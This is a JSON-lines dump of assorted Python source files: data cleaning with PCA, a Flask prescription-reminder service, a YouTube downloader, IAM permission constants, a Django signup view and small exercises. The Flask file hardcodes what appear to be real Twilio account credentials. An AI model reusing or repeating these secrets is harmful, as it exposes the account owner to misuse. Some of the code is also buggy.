data._get_numeric_data().columns\n nominal_cols = list(set(cols) - set(num_cols))\n\n data[nominal_cols] = convert_data_to_numeric(data[nominal_cols])\n\n features = data[list(range(0, num_features))]\n target = data[[num_features]]\n\n # First 10 rows\n print('Training Data:\\n\\n' + str(features[:10]))\n print('\\n')\n print('Targets:\\n\\n' + str(target[:10]))\n\n # Model declaration\n if n_components < 1:\n pca = PCA(n_components = n_components, svd_solver = 'full')\n else:\n pca = PCA(n_components = n_components)\n\n # Model training\n pca.fit(features)\n\n # Model transformation\n new_feature_vector = pca.transform(features)\n\n # Model information:\n print('\\nModel information:\\n')\n print('Number of components elected: ' + str(pca.n_components))\n print('New feature dimension: ' + str(pca.n_components_))\n print('Variance of every feature: ' + str(sum(pca.explained_variance_ratio_ )))\n print('Variance of every feature: ' + str(pca.explained_variance_ratio_ ))\n\n # First 10 rows of new feature vector\n print('\\nNew feature vector:\\n')\n print(new_feature_vector[:10])\n\n # Print complete dictionary\n # print(pca.__dict__)\n\ndef convert_data_to_numeric(data):\n\n numpy_data = data.values\n\n for i in range(len(numpy_data[0])):\n temp = numpy_data[:,i]\n dict = numpy.unique(numpy_data[:,i])\n # print(dict)\n for j in range(len(dict)):\n #print(numpy.where(numpy_data[:,i] == dict[j]))\n temp[numpy.where(numpy_data[:,i] == dict[j])] = j\n\n numpy_data[:,i] = temp\n\n return numpy_data\n\ndef remove_columns(data, column):\n data = data.drop(column, axis=1, inplace=True)\n return data\n\ndef remove_outliers(data, feature, outlier_value):\n outliers = data.loc[data[feature] >= outlier_value, feature].index\n data.drop(outliers, inplace=True)\n return data\n\ndef replace_missing_values_with_mode(data, features):\n features = data[features]\n columns = features.columns\n mode = data[columns].mode()\n data[columns] = data[columns].fillna(mode.iloc[0])\n return data\n\ndef replace_missing_values_with_constant(data):\n #data['Alley'] = data['Alley'].fillna('NOACCESS')\n\n for col in ('BsmtQual', 'BsmtCond', 'BsmtExposure', 'BsmtFinType1', 'BsmtFinType2'):\n data[col] = data[col].fillna('0')\n\n \"\"\"data['FireplaceQu'] = data['FireplaceQu'].fillna('NoFP')\n\n for col in ('GarageType', 'GarageFinish', 'GarageQual'):\n data[col] = data[col].fillna('NoGRG')\n\n data['Fence'] = data['Fence'].fillna('NOFENCE')\n data['MiscFeature'] = data['MiscFeature'].fillna('NOMISC')\n\"\"\"\n return data\n\ndef z_score_normalization(data):\n # import data\n num_features = len(data.columns) - 1\n\n cols = data.columns\n num_cols = data._get_numeric_data().columns\n nominal_cols = list(set(cols) - set(num_cols))\n\n data[nominal_cols] = convert_data_to_numeric(data[nominal_cols])\n\n features = data[list(range(0, num_features))]\n target = data[[num_features]]\n\n # First 10 rows\n print('Training Data:\\n\\n' + str(features[:10]))\n print('\\n')\n print('Targets:\\n\\n' + str(target[:10]))\n\n # Data standarization\n standardized_data = preprocessing.scale(features)\n\n # First 10 rows of new feature vector\n print('\\nNew feature vector:\\n')\n print(standardized_data[:10])\n\n\ndef min_max_scaler(data):\n \"\"\"# import data\n num_features = len(data.columns) - 1\n cols = data.columns\n num_cols = data._get_numeric_data().columns\n nominal_cols = list(set(cols) - set(num_cols))\n data[nominal_cols] = convert_data_to_numeric(data[nominal_cols])\n features = data[list(range(1, num_features))]\n target = data[[num_features]]\"\"\"\n\n features = data[:,0:-1]\n target = data[:,-1]\n\n # First 10 rows\n print('Training Data:\\n\\n' + str(features[:10]))\n print('\\n')\n print('Targets:\\n\\n' + str(target[:10]))\n\n # Data normalization\n min_max_scaler = preprocessing.MinMaxScaler()\n\n min_max_scaler.fit(features)\n\n # Model information:\n print('\\nModel information:\\n')\n print('Data min: ' + str(min_max_scaler.data_min_))\n print('Data max: ' + str(min_max_scaler.data_max_))\n\n new_feature_vector = min_max_scaler.transform(features)\n\n # First 10 rows of new feature vector\n print('\\nNew feature vector:\\n')\n print(new_feature_vector[:10])\n\n new_data = np.append(new_feature_vector, target.reshape(target.shape[0], -1), axis=1)\n print('\\nNew array\\n')\n print(new_data)\n\n return new_data\n\n\nif __name__ == '__main__':\n print(\"------------DATA SIN LIMPIEZA------------\")\n #data = open_file('train.csv')\n data = open_file('test.csv')\n print(data)\n remove_outliers(data, 'full_sq', 5000)\n remove_outliers(data, 'max_floor', 80)\n remove_outliers(data, 'num_room', 15)\n\n print(\"------------LIMPIEZA------------\")\n\n\n remove_columns(data, ['max_floor','timestamp','hospital_beds_raion','state', 'num_room'])\n replace_missing_values_with_mode(data, ['build_year','material','kitch_sq','floor'])\n data = data.fillna(0)\n convert_data_to_numeric(data)\n \n\n principal_components_analysis(data, 72)\n z_score_normalization(data)\n\n print(data)\n\n print(\"---------------------------------------Arbol de Decision---------------------------------------------\")\n\n #new_data= data\n new_data = convert_data_to_numeric(data)\n\n\n feature_vector = new_data[:,0:-1]\n targets = new_data[:,-1]\n\n data_features_train, data_features_test, data_targets_train, data_targets_test = \\\n train_test_split(feature_vector,\n targets,\n test_size=0.25, random_state=24)\n\n # Model declaration\n \"\"\"\n Parameters to select:\n criterion: \"mse\"\n max_depth: maximum depth of tree, default: None\n \"\"\"\n dec_tree_reg = DecisionTreeRegressor(criterion='mse', max_depth=40)\n dec_tree_reg.fit(data_features_train, data_targets_train)\n\n # Model evaluation\n test_data_predicted = dec_tree_reg.predict(data_features_test)\n\n error = metrics.mean_absolute_error(data_targets_test, test_data_predicted)\n\n print('Total Error: ' + str(error))\n print(data)\n #write_file(data, 'output.csv')\n\n #write_file(data, 'outputtrain.csv')\n write_file(data, 'outputtest.csv')\n","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":7257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"578200829","text":"import time\nimport flask\nfrom flask import request, jsonify\nfrom flask_cors import CORS\nfrom google.cloud import vision\nimport io\nimport os\nfrom twilio.rest import Client\nfrom datetime import datetime\nimport json\nfrom twilio.twiml.messaging_response import MessagingResponse\nimport sqlite3\nimport requests\nimport schedule\nimport atexit\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\napp = flask.Flask(__name__)\nCORS(app)\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"My First Project-256dbe03ec7e.json\"\n\ndef check_appointments(event=None, context=None):\n mydb = sqlite3.connect('reminders.db')\n mycursor = mydb.cursor()\n current_day = datetime.today().day\n current_month = datetime.today().month\n current_hour = datetime.today().hour\n\n formatted_date = datetime.today().strftime(\"%B, %d\")\n mycursor.execute(\"SELECT * FROM reminders\")\n output = mycursor.fetchall()\n\n for reminder in output:\n if reminder[7] == \"D\":\n if reminder[3] == current_hour and reminder[5] <= reminder[6]:\n if reminder[8] == 'sms':\n print(\"SMS sent\")\n send_sms_message(reminder)\n elif reminder[8] == 'phoneCall':\n print(\"Call sent\")\n send_call_message(reminder)\n c = reminder[5] + 1\n sql = \"UPDATE reminders SET count = ? WHERE name = ? AND phone = ? AND title = ?\"\n val = (str(c), reminder[0], reminder[1], reminder[2])\n mycursor.execute(sql, val)\n mydb.commit()\n\n elif reminder[7] == \"W\":\n if reminder[3] == current_day and reminder[5] <= reminder[6] and current_hour == \"18\":\n if reminder[8] == 'sms':\n print(\"SMS sent\")\n send_sms_message(reminder)\n elif reminder[8] == 'phoneCall':\n print(\"Call sent\")\n send_call_message(reminder)\n c = reminder[5] + 1\n sql = \"UPDATE reminders SET count = ? WHERE name = ? AND phone = ? AND title = ?\"\n val = (str(c), reminder[0], reminder[1], reminder[2])\n mycursor.execute(sql, val)\n mydb.commit()\n\ndef send_sms_message(reminder):\n account_sid = 'id goes here'\n auth_token = 'token goes here'\n client = Client(account_sid, auth_token)\n\n message = client.messages \\\n .create(\n body=f\"Hi, {reminder[0]}. This is a reminder to take {reminder[2]} at a dosage of {reminder[4]}. Reply YES to confirm.\",\n from_='+18013370504',\n to=reminder[1]\n )\n\n print(message.sid)\n\ndef send_call_message(reminder):\n account_sid = 'AC54a47a1d46b4b3c91285dba37849b3d2'\n auth_token = '718efa2ce0731bf1451df22aeaf383af'\n client = Client(account_sid, auth_token)\n msg = f\"This is a reminder to take, {reminder[2]}, at a dosage of,,, {reminder[4]}.\"\n call = client.calls.create(\n twiml=f'Hi, {reminder[0]}! {msg} Again, {msg}',\n to=reminder[1],\n from_='+18013370504'\n )\n print(call.sid)\n\"\"\"\nscheduler = BackgroundScheduler()\nscheduler.add_job(func=check_appointments, trigger=\"interval\", seconds=60)\nscheduler.start()\n\"\"\"\ncheck_appointments()\n@app.route('/detect_text', methods=['GET', 'POST'])\ndef detect_text():\n if request.method == 'POST':\n if os.path.exists(\"myimg.jpg\"):\n os.remove(\"myimg.jpg\")\n print('GOT IN POST')\n post = request.get_json()\n content = requests.get(post['imgDownloadURL']).content\n\n \"\"\"\n f = request.files['imgFileData']\n print(f)\n con = f.read()\n\n d = request.data['otherData']\n print(d)\n \"\"\"\n \"\"\"\n other_data = request.files['otherData']\n txt_con = other_data.read()\n with open('myinfo.json', mode='bx') as file:\n file.write(txt_con)\n \n\n with open('myimg.jpg', mode='bx') as file:\n file.write(con)\n \n path = \"myimg.jpg\"\n #path = \"prescription-label.png\"\n \n #Detects text in the file.\n \n print('saved the image')\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n \"\"\"\n client = vision.ImageAnnotatorClient()\n\n image = vision.Image(content=content)\n\n response = client.text_detection(image=image)\n texts = response.text_annotations\n print('Texts:')\n res = {}\n\n for text in texts:\n output = '\\n\"{}\"'.format(text.description)\n output = output.split('\\n')\n print(output)\n res['number'] = post['phoneNumber']\n res['mode'] = post['notificationMethod']\n res['pharm_name'] = output[1][1:]\n res['address'] = output[2]\n res['pharm-num'] = output[3]\n res['doc_name'] = output[4]\n res['rx_no'] = output[5][7:]\n res['date'] = output[6]\n res['user_name'] = output[7].split()[0].capitalize() + \" \" + output[7].split()[1].capitalize()\n dose, time = output[8].split(',')\n res['dosage'] = dose[6:]\n res['frequency'] = time[1]\n res['title'] = output[9]\n res['max'] = int(output[10][5:])\n res['refill'] = output[11]\n print(res)\n break\n\n if response.error.message:\n raise Exception(\n '{}\\nFor more info on error messages, check: '\n 'https://cloud.google.com/apis/design/errors'.format(\n response.error.message))\n\n mydb = sqlite3.connect('reminders.db')\n mycursor = mydb.cursor()\n try:\n if res['frequency'] == \"W\":\n res['due'] = current_day = str(datetime.today().day)\n elif res['frequency'] == \"D\":\n res['due'] = current_hour = str(datetime.today().hour)\n except:\n res['frequency'] = 'D'\n\n sql = \"INSERT INTO reminders (name, phone, title, due, dosage, count, max, frequency, mode) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\"\n val = (res['user_name'], res['number'], res['title'], res['due'], res['dosage'], \"0\", str(res['max']),\n res['frequency'], res['mode'])\n\n mycursor.execute(sql, val)\n mydb.commit()\n print(res)\n return jsonify(res), 200\n\n\n@app.route('/sms_reminder')\ndef sms_reminder():\n check_appointments()\n return \"Success\", 200\n\n\n@app.route('/hack', methods=['GET', 'POST'])\ndef hack():\n msg = request.values.get('Body').lower() #gets incoming message\n res = MessagingResponse()\n if msg == \"yes\": #based on incoming message, send different message\n res.message(\"Taking your pill confirmed!\")\n else:\n res.message(\"Invalid response. Reply YES to confirm. Reply HELP for more options.\")\n return str(res)\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"flask logic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"584634767","text":"a = \"Cihan\"\nprint(a[:-1])\ntry:\n a = int(input(\"Tell me one number:\"))\n b = int(input(\"Tell me one number:\"))\n print(a / b)\n print(\"Okay\")\nexcept ValueError:\n print(\"Could not convert to a number\")\nexcept ZeroDivisionError:\n print(\"Can't divide by zero\")\nexcept:\n print(\"Something went very wrong\")\nprint(\"Outside\")\n\ndata = []\nfile_name = input(\"Provide a name of file of data\")\n\ntry:\n fh = open(file_name, 'r')\nexcept IOError:\n print('can not open', file_name)\nelse:\n for new in fh:\n if new != '\\n':\n addIt = new[:-1].split(',')\n data.append(addIt)\nfinally:\n fh.close() # close file even if fail\n\n\n\n","sub_path":"Edx/ExceptionSample.py","file_name":"ExceptionSample.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"575859867","text":"import glob\nimport os\nimport sys\n\nvideo_type = sys.argv[1]\ni = int(sys.argv[2])\n\nif video_type == 'p':\n\tvideo_type = 'porn'\nelse:\n\tvideo_type = 'normal'\n\nvideo_from_path = f'D:/videos_for_train/{video_type}/videos'\nvideo_to_path = f'D:/videos_for_train/{video_type}/videos'\n\nfor video in glob.glob(f'{video_from_path}/*.mp4'):\n\tnew_name = f'{video_to_path}/{i:04}.mp4'\n\t# new_name = '%s/%.4d.mp4' %(video_to_path, i)\n\tos.rename(video, new_name)\n\ti += 1","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"52885697","text":"\n\nfrom xai.brain.wordbase.verbs._pillage import _PILLAGE\n\n#calss header\nclass _PILLAGING(_PILLAGE, ):\n\tdef __init__(self,): \n\t\t_PILLAGE.__init__(self)\n\t\tself.name = \"PILLAGING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"pillage\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_pillaging.py","file_name":"_pillaging.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"193344387","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTencentBlueKing is pleased to support the open source community by making 蓝鲸智云-权限中心(BlueKing-IAM) available.\nCopyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License.\nYou may obtain a copy of the License at http://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on\nan \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License.\n\"\"\"\nfrom aenum import LowerStrEnum, StrEnum, auto, skip\nfrom django.utils.translation import gettext as _\n\nfrom backend.util.enum import ChoicesEnum\n\nANY_ID = \"*\"\nADMIN_USER = \"admin\"\nSYSTEM_ALL = \"*\"\nACTION_ALL = \"*\"\nSUBJECT_ALL = \"*\"\nSUBJECT_TYPE_ALL = \"*\"\n\n\nclass SubjectType(ChoicesEnum, LowerStrEnum):\n ALL = \"*\"\n USER = auto()\n DEPARTMENT = auto()\n GROUP = auto()\n\n _choices_labels = skip(((USER, _(\"用户\")), (GROUP, _(\"用户组\")), (DEPARTMENT, _(\"部门\"))))\n\n\nclass SubjectRelationType(ChoicesEnum, LowerStrEnum):\n \"\"\"用户的权限来源关系\"\"\"\n\n DEPARTMENT = auto()\n GROUP = auto()\n\n _choices_labels = skip(((GROUP, \"用户组\"), (DEPARTMENT, \"部门\")))\n\n\n# ---------------------------------------------------------------------------------------------- #\n# Group Constants\n# ---------------------------------------------------------------------------------------------- #\nclass GroupMemberType(ChoicesEnum, LowerStrEnum):\n USER = auto()\n DEPARTMENT = auto()\n\n _choices_labels = skip(((USER, \"用户\"), (DEPARTMENT, \"部门\")))\n\n\nclass GroupSaaSAttributeEnum(ChoicesEnum, LowerStrEnum):\n \"\"\"用户组SaaS属性枚举\"\"\"\n\n READONLY = auto()\n\n _choices_labels = skip(((READONLY, \"只读\"),))\n\n\nclass GroupAttributeValueTypeEnum(ChoicesEnum, LowerStrEnum):\n \"\"\"用户组SaaS属性值的数据类型\"\"\"\n\n String = auto()\n Boolean = auto()\n Integer = auto()\n\n\n# 每个属性的值类型\nGROUP_SAAS_ATTRIBUTE_VALUE_TYPE_MAP = {\n GroupSaaSAttributeEnum.READONLY.value: GroupAttributeValueTypeEnum.Boolean.value\n}\n# 每个属性的默认值\nGROUP_SAAS_ATTRIBUTE_DEFAULT_VALUE_MAP = {GroupSaaSAttributeEnum.READONLY.value: False}\n\n\n# ---------------------------------------------------------------------------------------------- #\n# Policy Constants\n# ---------------------------------------------------------------------------------------------- #\nclass SelectionMode(ChoicesEnum, LowerStrEnum):\n ALL = auto()\n INSTANCE = auto()\n ATTRIBUTE = auto()\n\n _choices_labels = skip(((ALL, _(\"实例与属性\")), (INSTANCE, _(\"实例\")), (ATTRIBUTE, _(\"属性\"))))\n\n\n# ---------------------------------------------------------------------------------------------- #\n# Role Constants\n# ---------------------------------------------------------------------------------------------- #\nclass RoleType(ChoicesEnum, LowerStrEnum):\n STAFF = auto()\n SUPER_MANAGER = auto()\n SYSTEM_MANAGER = auto()\n RATING_MANAGER = auto()\n\n _choices_labels = skip(\n ((STAFF, \"个人用户\"), (SUPER_MANAGER, \"超级管理员\"), (SYSTEM_MANAGER, \"系统管理员\"), (RATING_MANAGER, \"分级管理员\"))\n )\n\n\nclass RoleScopeType(ChoicesEnum, LowerStrEnum):\n AUTHORIZATION = auto()\n SUBJECT = auto()\n\n _choices_labels = skip(((AUTHORIZATION, \"系统操作\"), (SUBJECT, \"授权对象\")))\n\n\nclass RoleRelatedObjectType(ChoicesEnum, LowerStrEnum):\n TEMPLATE = auto()\n GROUP = auto()\n\n _choices_labels = skip(((TEMPLATE, \"权限模板\"), (GROUP, \"用户组\")))\n\n\nclass RoleScopeSubjectType(ChoicesEnum, LowerStrEnum):\n USER = auto()\n DEPARTMENT = auto()\n ANY = \"*\"\n\n _choices_labels = skip(((USER, \"用户\"), (DEPARTMENT, \"部门\"), (ANY, \"任意\")))\n\n\nclass RoleSourceTypeEnum(ChoicesEnum, LowerStrEnum):\n \"\"\"角色创建来源\"\"\"\n\n API = auto()\n WEB = auto()\n DEFAULT_INIT = auto()\n\n _choices_labels = skip(((API, \"api\"), (WEB, \"web\"), (DEFAULT_INIT, \"default init\")))\n\n\nclass PermissionCodeEnum(ChoicesEnum, LowerStrEnum):\n MANAGE_GROUP = auto()\n MANAGE_TEMPLATE = auto()\n MANAGE_RATING_MANAGER_MEMBER = auto()\n MANAGE_SUPER_MANAGER_MEMBER = auto()\n MANAGE_SYSTEM_MANAGER_MEMBER = auto()\n CREATE_RATING_MANAGER = auto()\n MANAGE_RATING_MANAGER = auto()\n TRANSFER_GROUP = auto()\n AUDIT = auto()\n CONFIGURE_APPROVAL_PROCESS = auto()\n CONFIGURE_MANAGER = auto()\n MANAGE_SYSTEM_SETTING = auto()\n MANAGE_GLOBAL_SETTING = auto()\n MANAGE_ORGANIZATION = auto()\n MANAGE_COMMON_ACTION = auto()\n\n\n# ---------------------------------------------------------------------------------------------- #\n# Template Constants\n# ---------------------------------------------------------------------------------------------- #\nclass TemplatePreUpdateStatus(ChoicesEnum, LowerStrEnum):\n WAITING = auto()\n RUNNING = auto()\n FINISHED = auto()\n\n _choices_labels = skip(((RUNNING, \"运行中\"), (WAITING, \"等待中\")))\n\n\n# ---------------------------------------------------------------------------------------------- #\n# Application & Approval Constants\n# ---------------------------------------------------------------------------------------------- #\nclass ApplicationTypeEnum(ChoicesEnum, LowerStrEnum):\n GRANT_ACTION = auto()\n RENEW_ACTION = auto()\n JOIN_GROUP = auto()\n RENEW_GROUP = auto()\n JOIN_RATING_MANAGER = auto()\n CREATE_RATING_MANAGER = auto()\n UPDATE_RATING_MANAGER = auto()\n\n _choices_labels = skip(\n (\n (GRANT_ACTION, \"自定义权限申请\"),\n (RENEW_ACTION, \"自定义权限续期\"),\n (JOIN_GROUP, \"加入用户组\"),\n (RENEW_GROUP, \"用户组续期\"),\n (JOIN_RATING_MANAGER, \"加入分级管理员\"),\n (CREATE_RATING_MANAGER, \"创建分级管理员\"),\n (UPDATE_RATING_MANAGER, \"修改分级管理员\"),\n )\n )\n\n\n# IAM支持的审批流程节点类型\nclass ProcessorNodeTypeEnum(LowerStrEnum):\n SUPER_MANAGER = auto()\n SYSTEM_MANAGER = auto()\n RATING_MANAGER = auto()\n INSTANCE_APPROVER = auto()\n\n\n# 每一种申请单据,对应的审批流程节点可以支持的ROLE\nAPPLICATION_SUPPORT_PROCESSOR_ROLE_MAP = {\n ApplicationTypeEnum.GRANT_ACTION.value: (\n ProcessorNodeTypeEnum.SUPER_MANAGER.value,\n ProcessorNodeTypeEnum.SYSTEM_MANAGER.value,\n ProcessorNodeTypeEnum.INSTANCE_APPROVER.value,\n ),\n ApplicationTypeEnum.JOIN_GROUP.value: (\n ProcessorNodeTypeEnum.SUPER_MANAGER.value,\n ProcessorNodeTypeEnum.RATING_MANAGER.value,\n ),\n ApplicationTypeEnum.JOIN_RATING_MANAGER.value: (\n ProcessorNodeTypeEnum.SUPER_MANAGER.value,\n ProcessorNodeTypeEnum.RATING_MANAGER.value,\n ),\n ApplicationTypeEnum.CREATE_RATING_MANAGER.value: (ProcessorNodeTypeEnum.SUPER_MANAGER.value,),\n ApplicationTypeEnum.UPDATE_RATING_MANAGER.value: (ProcessorNodeTypeEnum.SUPER_MANAGER.value,),\n}\n\n\nclass ProcessorSourceEnum(ChoicesEnum, StrEnum):\n \"\"\"审批流程节点里的处理者来源\"\"\"\n\n IAM = auto()\n OTHER = auto()\n\n\n# 对于IAM来源的处理者,IAM有固定支持的处理者类型\nIAM_SUPPORT_PROCESSOR_TYPES = [\n ProcessorNodeTypeEnum.SUPER_MANAGER.value,\n ProcessorNodeTypeEnum.SYSTEM_MANAGER.value,\n ProcessorNodeTypeEnum.RATING_MANAGER.value,\n ProcessorNodeTypeEnum.INSTANCE_APPROVER.value,\n]\n\n\n# 支持配置默认流程的申请审批类型\nDEFAULT_PROCESS_SUPPORT_APPLICATION_TYPES = [\n ApplicationTypeEnum.GRANT_ACTION.value,\n ApplicationTypeEnum.JOIN_GROUP.value,\n ApplicationTypeEnum.CREATE_RATING_MANAGER.value,\n]\n\n\nclass ApplicationStatus(ChoicesEnum, LowerStrEnum):\n \"\"\"申请单状态\"\"\"\n\n PENDING = auto()\n PASS = auto()\n REJECT = auto()\n CANCELLED = auto()\n\n _choices_labels = skip(((PENDING, _(\"审批中\")), (PASS, _(\"通过\")), (REJECT, _(\"拒绝\")), (CANCELLED, _(\"已取消\"))))\n","sub_path":"saas/backend/service/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":8131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"226001961","text":"class Solution(object):\n def numTrees(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n dp = [0] * (n+1)\n dp[0] = 1\n for i in range(1,n+1):\n dp[i] = sum([dp[x]*dp[i-1-x] for x in range(i)])\n return dp[-1]","sub_path":"Python/leetcode.096.unique-binary-search-trees.py","file_name":"leetcode.096.unique-binary-search-trees.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"32562855","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 13 16:38:07 2018\r\n\r\n@author: 94\r\n\"\"\"\r\n\r\nimport speech_recognition as sr\r\nr = sr.Recognizer()\r\nmic = sr.Microphone()\r\nprint(sr.Microphone.list_microphone_names())\r\nprint(\"say something\")\r\nwith mic as source:\r\n audio = r.listen(source)\r\n\r\nprint(\"stop saying\")\r\nrecorded_string=r.recognize_google(audio)\r\nprint(\"recorded string: \"+recorded_string)\r\n#i=0\r\n#while i < len(recorded_string):\r\n# print(recorded_string[i])\r\n# if (recorded_string[i]=='x'):\r\n# print(\"this is it\")\r\n# i+=1\r\n\r\n# removing spaces\r\nnew=recorded_string.replace(\"time\",\"x\").replace(\"times\",\"x\").replace(\"bar\",\"x\").replace(\"part\",\"x\").replace(\"baar\",\"x\").replace(\" \",\"\")\r\n\r\nprint(\"processed string: \"+new)\r\n\r\n\r\n\r\n#processing the x/times\r\n#condition (1) the string must contain only numbers and x\r\n#condition (2) x should not be in the beginning or end\r\ni=0\r\nx=0\r\nnewlist1=list(new)\r\nnewlist2=[]\r\nwhile i < (len(newlist1)):\r\n x=0\r\n if ((newlist1[i]=='x')|(newlist1[i]=='X')):\r\n frequency=int(newlist1[i-1])\r\n newlist2[len(newlist2)-1]=newlist1[i+1]\r\n while x < (frequency-2):\r\n newlist2.append(newlist1[i+1])\r\n x+=1\r\n else:\r\n newlist2.append(newlist1[i])\r\n i+=1\r\nprint(\"Final number :{}\".format(\"\".join(newlist2)))\r\n\r\nprint(\"done till here\")","sub_path":"working.py","file_name":"working.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"422894556","text":"# -*- coding: utf8 -*-\nimport os\nimport json\nimport time\nfrom pytube import YouTube\n\ncurdirpath = os.path.dirname(os.path.realpath(__file__))\n\nwith open(os.path.join(curdirpath, 'highlight-summer.json')) as data:\n videos = json.load(data)\n for key in videos.keys():\n outputdirpath = os.path.join(curdirpath, 'raw_files', 'highlight')\n if not os.path.exists(outputdirpath):\n os.makedirs(outputdirpath)\n filepath = os.path.join(outputdirpath, '{}.webm'.format(key))\n if os.path.exists(filepath):\n continue\n print('try to download: {}, {}'.format(key, videos[key]))\n YouTube(videos[key]).streams\\\n .filter(adaptive=True, only_video=True)\\\n .order_by('resolution').desc().first()\\\n .download(output_path=outputdirpath, filename=key)\n","sub_path":"videos/highlight_downloader.py","file_name":"highlight_downloader.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"601952595","text":"__author__ = 'yinjun'\n\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def deleteDuplicates(self, head):\n\n h = ListNode(0)\n h.next = head\n\n c = h\n a = h.next\n\n if a == None or a.next == None:\n return h.next\n\n b = a.next\n\n while b != None:\n\n find = a.val == b.val\n while b!=None and a.val == b.val:\n b = b.next\n if find:\n c.next = b\n a = b\n\n if b!=None:\n b = b.next\n else:\n c = a\n a = a.next\n b = a.next\n\n return h.next\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None","sub_path":"LeetCode/python/061-090/082-remove-duplicates-from-sorted-list-ii/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"395760302","text":"import logging\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.contrib import messages\nfrom django.utils.translation import ugettext_lazy as _\nfrom .models import Organization, UserProfile\nfrom .member_forms import MemberSignupForm\nfrom django.conf import settings\nfrom django.utils.safestring import mark_safe\n\n\n# Copyright Videntity Systems Inc.\n\nlogger = logging.getLogger('verifymyidentity_.%s' % __name__)\n\n\ndef find_org_to_create_member_account(request):\n \"\"\"When the user posts the find_org_to_create_account form, redirect to that page\"\"\"\n if request.method != 'POST' or not request.POST.get('organization_slug'):\n return HttpResponseRedirect(reverse('home'))\n else:\n org_slug = request.POST.get('organization_slug')\n return HttpResponseRedirect(reverse('create_member_account', args=[org_slug]))\n\n\ndef create_member_account(request, organization_slug,\n service_title=settings.APPLICATION_TITLE):\n org = get_object_or_404(Organization, slug=organization_slug)\n name = _(\"Member Signup via %s\") % (org.name)\n if request.method == 'POST':\n form = MemberSignupForm(request.POST, request.FILES)\n if form.is_valid():\n user = form.save()\n up = UserProfile.objects.get(user=user)\n messages.success(request, _(\"\"\"Welcome %s %s.\n Your account %s was created with\n the username %s\"\"\" % (user.first_name, user.last_name,\n up.subject, user.username)))\n\n if user.is_active:\n messages.success(request, _(\n \"Your account is active and you may log in.\"))\n else:\n messages.error(request, _(\n \"Your account is not active so you may not log in at this time.\"))\n\n messages.warning(request, _(\n \"\"\"Someone at %s needs to activate your account.\"\"\" % (org.name, )))\n\n if user.email:\n messages.info(request, _(\n \"Check your email to confirm your email address.\"))\n else:\n messages.warning(request, _(\"\"\"You did not supply an email.\n For your security, please consider\n adding an email to this account.\"\"\"))\n\n if up.mobile_phone_number:\n messages.info(request, _(\n \"Thanks for providing a mobile phone number. A welcome message is on the way.\"))\n else:\n messages.warning(request, _(\"\"\"You did not supply a mobile phone number.\n So we may contact you, please consider\n adding a mobile phone number to this account.\"\"\"))\n\n msg = _(\"\"\"As a reminder, you created this\n account to gain access to %s.\"\"\" % (settings.KILLER_APP_URI,\n settings.KILLER_APP_TITLE))\n\n messages.info(request, _(mark_safe(msg)))\n\n # Notify Org member to approve ID.\n\n return HttpResponseRedirect(reverse('home'))\n else:\n # return the bound form with errors\n messages.error(request, _(\"The form contained errors.\"))\n return render(request,\n 'generic/bootstrapform.html',\n {'name': name, 'form': form,\n 'org_slug': org.slug,\n 'domain': org.domain,\n 'service_title': service_title})\n else:\n # this is an HTTP GET\n # Adding ability to pre-fill invitation_code and email\n # via GET parameters\n form_data = {\n 'invitation_code': request.GET.get('invitation_code', ''),\n 'email': request.GET.get('email', ''),\n 'first_name': request.GET.get('first_name', ''),\n 'last_name': request.GET.get('last_name', ''),\n 'nickname': request.GET.get('nickname', ''),\n 'sex': request.GET.get('sex', ''),\n 'gender': request.GET.get('gender', ''),\n 'phone_number': request.GET.get('phone_number', ''),\n 'org_slug': org.slug}\n return render(request, 'generic/bootstrapform.html',\n {'name': name, 'form':\n MemberSignupForm(initial=form_data),\n 'service_title': 